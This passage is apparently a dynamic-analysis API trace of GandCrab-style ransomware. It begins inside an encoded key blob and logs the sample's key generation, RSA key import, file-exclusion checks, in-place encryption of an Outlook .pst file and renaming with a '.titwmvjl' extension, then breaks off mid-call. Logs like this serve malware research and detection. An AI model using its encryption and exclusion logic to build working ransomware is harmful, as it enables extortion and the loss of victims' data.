50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0091.371] WriteFile (in: hFile=0x2ac, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f274, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f274*=0x2162, lpOverlapped=0x0) returned 1 [0091.372] CloseHandle (hObject=0x2ac) returned 1 [0091.372] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.372] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.372] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x24, wMilliseconds=0x2a5)) [0091.372] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.372] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0091.372] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0091.373] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\d2ca4a09d2ca4deb61a.lock") returned 70 [0091.373] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\outlook files\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2ac [0091.639] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.639] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.639] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\") returned 46 [0091.639] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\*" [0091.640] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\*", fInfoLevelId=0x1, lpFindFileData=0x259f290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f290) returned 0x5038f8 [0091.640] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.640] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0091.641] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.641] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.641] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0091.641] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0091.641] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0091.641] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\d2ca4a09d2ca4deb61a.lock" [0091.641] lstrlenW (lpString=".titwmvjl") returned 9 [0091.641] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\d2ca4a09d2ca4deb61a.lock") returned 70 [0091.641] VirtualAlloc (lpAddress=0x0, dwSize=0xcc, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.641] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 79 [0091.641] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\d2ca4a09d2ca4deb61a.lock") returned 70 [0091.641] lstrlenW (lpString=".lock") returned 5 [0091.641] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.641] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0091.642] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.642] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.642] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0091.642] lstrcmpW (lpString1="lcfkj@kiekc.df.pst", lpString2=".") returned 1 [0091.642] lstrcmpW (lpString1="lcfkj@kiekc.df.pst", lpString2="..") returned 1 [0091.642] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\", lpString2="lcfkj@kiekc.df.pst" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\lcfkj@kiekc.df.pst") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\lcfkj@kiekc.df.pst" [0091.642] lstrlenW (lpString=".titwmvjl") returned 9 [0091.642] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\lcfkj@kiekc.df.pst") returned 64 [0091.642] VirtualAlloc (lpAddress=0x0, dwSize=0xc0, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.643] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\lcfkj@kiekc.df.pst.titwmvjl") returned 73 [0091.643] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\lcfkj@kiekc.df.pst") returned 64 [0091.643] lstrlenW (lpString=".pst") returned 4 [0091.643] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.643] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".pst ") returned 5 [0091.643] lstrcmpiW (lpString1=".pst", lpString2=".titwmvjl") returned -1 [0091.643] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.643] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\lcfkj@kiekc.df.pst") returned 64 [0091.643] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\lcfkj@kiekc.df.pst") returned 64 [0091.643] lstrcmpiW (lpString1="lcfkj@kiekc.df.pst", lpString2="desktop.ini") returned 1 [0091.643] lstrcmpiW (lpString1="lcfkj@kiekc.df.pst", lpString2="autorun.inf") returned 1 [0091.644] lstrcmpiW (lpString1="lcfkj@kiekc.df.pst", lpString2="ntuser.dat") returned -1 [0091.644] lstrcmpiW (lpString1="lcfkj@kiekc.df.pst", lpString2="iconcache.db") returned 1 [0091.644] lstrcmpiW (lpString1="lcfkj@kiekc.df.pst", lpString2="bootsect.bak") returned 1 [0091.644] lstrcmpiW (lpString1="lcfkj@kiekc.df.pst", lpString2="boot.ini") returned 1 [0091.644] lstrcmpiW (lpString1="lcfkj@kiekc.df.pst", lpString2="ntuser.dat.log") returned -1 [0091.644] lstrcmpiW (lpString1="lcfkj@kiekc.df.pst", lpString2="thumbs.db") returned -1 [0091.644] lstrcmpiW (lpString1="lcfkj@kiekc.df.pst", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0091.644] lstrcmpiW (lpString1="lcfkj@kiekc.df.pst", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0091.644] lstrcmpiW (lpString1="lcfkj@kiekc.df.pst", lpString2="KRAB-DECRYPT.html") returned 1 [0091.644] lstrcmpiW (lpString1="lcfkj@kiekc.df.pst", lpString2="CRAB-DECRYPT.html") returned 1 [0091.644] lstrcmpiW (lpString1="lcfkj@kiekc.df.pst", lpString2="KRAB-DECRYPT.txt") returned 1 [0091.644] lstrcmpiW (lpString1="lcfkj@kiekc.df.pst", lpString2="CRAB-DECRYPT.txt") returned 1 [0091.644] lstrcmpiW (lpString1="lcfkj@kiekc.df.pst", lpString2="ntldr") returned -1 [0091.644] lstrcmpiW (lpString1="lcfkj@kiekc.df.pst", lpString2="NTDETECT.COM") returned -1 [0091.644] lstrcmpiW (lpString1="lcfkj@kiekc.df.pst", lpString2="Bootfont.bin") returned 1 [0091.644] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\lcfkj@kiekc.df.pst") returned 64 [0091.644] lstrlenW (lpString=".pst") returned 4 [0091.644] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.644] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".pst ") returned 5 [0091.644] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.645] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.645] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\lcfkj@kiekc.df.pst" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\outlook files\\lcfkj@kiekc.df.pst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0091.645] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.645] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0091.647] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.647] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.647] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0091.647] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0091.648] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0091.648] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0091.648] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0091.648] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.648] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.648] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.648] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.649] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0091.649] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0091.649] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0091.650] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0091.650] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0091.650] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.650] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.650] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.650] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.650] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0091.651] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.651] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5034f8) returned 1 [0091.651] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.651] CryptGetKeyParam (in: hKey=0x5034f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0091.651] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.652] CryptEncrypt (in: hKey=0x5034f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0091.652] GetLastError () returned 0x0 [0091.652] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.652] CryptDestroyKey (hKey=0x5034f8) returned 1 [0091.653] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.653] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.653] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.654] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0091.654] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.654] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5031f8) returned 1 [0091.654] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.655] CryptGetKeyParam (in: hKey=0x5031f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0091.655] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.655] CryptEncrypt (in: hKey=0x5031f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0091.655] GetLastError () returned 0x0 [0091.655] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.656] CryptDestroyKey (hKey=0x5031f8) returned 1 [0091.656] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.656] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.656] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0091.656] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0091.657] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x42400, lpOverlapped=0x0) returned 1 [0091.738] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffbdc00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.738] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x42400, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x42400, lpOverlapped=0x0) returned 1 [0091.866] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.866] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0091.867] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.871] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.872] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.872] CloseHandle (hObject=0x2b4) returned 1 [0091.873] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\lcfkj@kiekc.df.pst" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\outlook files\\lcfkj@kiekc.df.pst"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\lcfkj@kiekc.df.pst.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\outlook files\\lcfkj@kiekc.df.pst.titwmvjl"), dwFlags=0x1) returned 1 [0091.873] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.873] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0091.873] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0091.873] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0091.873] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\TITWMVJL-DECRYPT.txt" [0091.874] lstrlenW (lpString=".titwmvjl") returned 9 [0091.874] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\TITWMVJL-DECRYPT.txt") returned 66 [0091.874] VirtualAlloc (lpAddress=0x0, dwSize=0xc4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.874] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 75 [0091.874] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\TITWMVJL-DECRYPT.txt") returned 66 [0091.874] lstrlenW (lpString=".txt") returned 4 [0091.874] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.874] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0091.874] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0091.874] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.874] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\TITWMVJL-DECRYPT.txt") returned 66 [0091.874] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\TITWMVJL-DECRYPT.txt") returned 66 [0091.874] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0091.874] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0091.874] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0091.874] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0091.874] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0091.874] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0091.874] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0091.874] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0091.874] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.875] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259f290 | out: 